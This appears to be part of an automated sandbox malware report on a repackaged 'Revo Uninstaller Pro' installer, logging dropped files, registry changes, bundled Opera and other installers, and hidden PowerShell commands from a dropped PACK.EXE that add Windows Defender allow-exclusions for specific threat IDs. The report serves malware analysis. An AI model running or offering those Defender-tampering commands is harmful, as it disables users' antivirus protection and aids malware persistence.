        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: dpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: Revo Uninstaller Pro.lnk.0.drLNK file: ..\..\..\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
        Source: Revo Uninstaller Pro.lnk0.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
        Source: Uninstall Revo Uninstaller Pro.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile written: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\dutch.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeAutomated click: OK
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeAutomated click: Next >
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeAutomated click: Next >
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeAutomated click: Install
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Windows\SYSTEM32\RICHED32.DLLJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo GroupJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller ProJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dllJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exeJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exeJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exeJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.infJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\VistaJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.infJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sysJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10Jump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.infJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sysJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\License.txtJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Revo Uninstaller Pro Help.pdfJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\reg_lp.batJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\rupilogs.rupldbJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\langJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\Estonian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\albanian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\arabic.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\armenian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\azerbaijani.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\bengali.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\bulgarian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\czech.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\danish.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\dutch.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\english.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\finnish.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\french.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\german.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\gujarati.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hebrew.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hellenic.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hindi.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hrvatski.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hungarian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\indonesian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\italiano.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\japanese.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\korean.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\kurdish.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\macedonian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\norwegian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\persian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\polish.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguese.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguese_standard.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguesebrazil.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\romanian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\russian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\serbian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\serbianLatin.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\simplifiedchinese.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\slovak.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\slovenian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\spanish.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\swedish.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\thai.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\traditionalchinese.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\turkish.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\ukrainian.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\vietnamese.iniJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exeJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.infJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Revo Uninstaller ProJump to behavior
        Source: Revo.Uninstaller.Pro.v5.3.4.exeStatic file information: File size 22221229 > 1048576
        Source: Revo.Uninstaller.Pro.v5.3.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x64\Release\VSProjectPro\VSProjectPro64.pdbU source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x86\Release\VSProjectPro\VSProjectPro.pdbO source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoAppBar\x64\Release\RevoAppBar.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000005177000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x64\Release\VSProjectPro\VSProjectPro64.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\ognian\source\repos\revoflt\x64\Release\revoflt.pdb source: rundll32.exe, 00000003.00000003.1633987388.000001994EEA8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoAppBar\Release\RevoAppBar.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000033DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoUninProPort\Release\RevoUPPort.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: installer.exe.pdb source: setup.exe, 00000021.00000000.2125308793.0000000000D28000.00000002.00000001.01000000.00000019.sdmp
        Source: Binary string: c:\minispy\filter\objfre_wlh_x86\i386\revoflt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RUExt\build\x86\Release\RUExt\RUExt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000008BC5000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x86\Release\VSProjectPro\VSProjectPro.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000040A9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoCmd\Release\RevoCmd.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000038C7000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\minispy\filter\objfre_wlh_x86\i386\revoflt.pdb2 source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\RevoCmd\x64\Release\RevoCmd.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.00000000056D4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\ognian\source\repos\revoflt\Release\revoflt.pdb source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000002E59000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4275562
        Source: Uninstall.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x2d16e
        Source: System.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x39be
        Source: ya.exe.16.drStatic PE information: real checksum: 0x0 should be: 0x31f21
        Source: INetC.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x4238d
        Source: PACK.EXE.0.drStatic PE information: real checksum: 0x184409 should be: 0x72a2e
        Source: INetC.dll.27.drStatic PE information: real checksum: 0x0 should be: 0x4238d
        Source: nsExec.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x939f
        Source: LangDLL.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xeae7
        Source: System.dll.27.drStatic PE information: real checksum: 0x0 should be: 0x39be
        Source: OperaSetup[1].exe.27.drStatic PE information: real checksum: 0x2219eb should be: 0x224e20
        Source: OperaSetup.exe.27.drStatic PE information: real checksum: 0x2219eb should be: 0x224e20
        Source: tsjtmfdm[1].pkg.0.drStatic PE information: real checksum: 0x184409 should be: 0x72a2e
        Source: nsDialogs.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x11042
        Source: RevoUnPro.exe.0.drStatic PE information: section name: .giats
        Source: RevoAppBar.exe.0.drStatic PE information: section name: .giats
        Source: RevoUninPro.exe.0.drStatic PE information: section name: .giats
        Source: ruplp.exe.0.drStatic PE information: section name: .didata
        Source: Opera_installer_2412091640027403532.dll.29.drStatic PE information: section name: .rodata
        Source: Opera_installer_2412091640027403532.dll.29.drStatic PE information: section name: CPADinfo
        Source: Opera_installer_2412091640027403532.dll.29.drStatic PE information: section name: malloc_h
        Source: Opera_installer_2412091640030686032.dll.30.drStatic PE information: section name: .rodata
        Source: Opera_installer_2412091640030686032.dll.30.drStatic PE information: section name: CPADinfo
        Source: Opera_installer_2412091640030686032.dll.30.drStatic PE information: section name: malloc_h
        Source: Opera_installer_2412091640042418092.dll.31.drStatic PE information: section name: .rodata
        Source: Opera_installer_2412091640042418092.dll.31.drStatic PE information: section name: CPADinfo
        Source: Opera_installer_2412091640042418092.dll.31.drStatic PE information: section name: malloc_h
        Source: Opera_installer_2412091640048718040.dll.32.drStatic PE information: section name: .rodata
        Source: Opera_installer_2412091640048718040.dll.32.drStatic PE information: section name: CPADinfo
        Source: Opera_installer_2412091640048718040.dll.32.drStatic PE information: section name: malloc_h
        Source: Opera_installer_2412091640052497196.dll.33.drStatic PE information: section name: .rodata
        Source: Opera_installer_2412091640052497196.dll.33.drStatic PE information: section name: CPADinfo
        Source: Opera_installer_2412091640052497196.dll.33.drStatic PE information: section name: malloc_h
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeCode function: 13_2_034BFD1C push eax; ret 13_2_034BFD1D
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeCode function: 13_2_035FFD0C push eax; iretd 13_2_035FFD0D
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FE336 push ecx; ret 16_2_002FE349
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FD870 push eax; ret 16_2_002FD88E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_045142CD push ebx; ret 17_2_045142DA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_04516820 push eax; ret 17_2_04516833
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_06E25C86 pushad ; iretd 17_2_06E25C87
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_06E25C74 pushad ; iretd 17_2_06E25C7E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_04AB6820 push eax; ret 23_2_04AB6833
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_04AB29C0 push 0000006Dh; ret 23_2_04AB29D8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_04AB3AB8 push ebx; retf 23_2_04AB3ADA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_071E4599 push eax; iretd 23_2_071E459A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_071E458E push eax; iretd 23_2_071E458F
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_071E4425 push ebp; iretd 23_2_071E4426
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_071E5C74 pushad ; iretd 23_2_071E5C7E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_071E5C86 pushad ; iretd 23_2_071E5C87
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_085E73C0 pushfd ; retf 23_2_085E73C1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_048A5E9D push esp; ret 25_2_048A5EC3
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_048A6820 push eax; ret 25_2_048A6833
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_048A3AB8 push ebx; retf 25_2_048A3ADA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_07252504 pushad ; iretd 25_2_0725250E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_07252516 pushad ; iretd 25_2_07252517
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_07255C74 pushad ; iretd 25_2_07255C7E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_07255C86 pushad ; iretd 25_2_07255C87

        Persistence and Installation Behavior

        barindex
        Source: c:\program files\vs revo group\revo uninstaller pro\ruext.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{2c5515dc-2a7e-4bfd-b813-cacc2b685eb7}\inprocserver32
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sysJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sysJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeFile created: C:\Users\user\AppData\Local\Temp\nsf82A3.tmp\INetC.dllJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\nsDialogs.dllJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\tsjtmfdm[1].pkgJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\LangDLL.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Opera_115.0.5322.77_Autoupdate_x64[1].exeJump to dropped file
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sysJump to dropped file
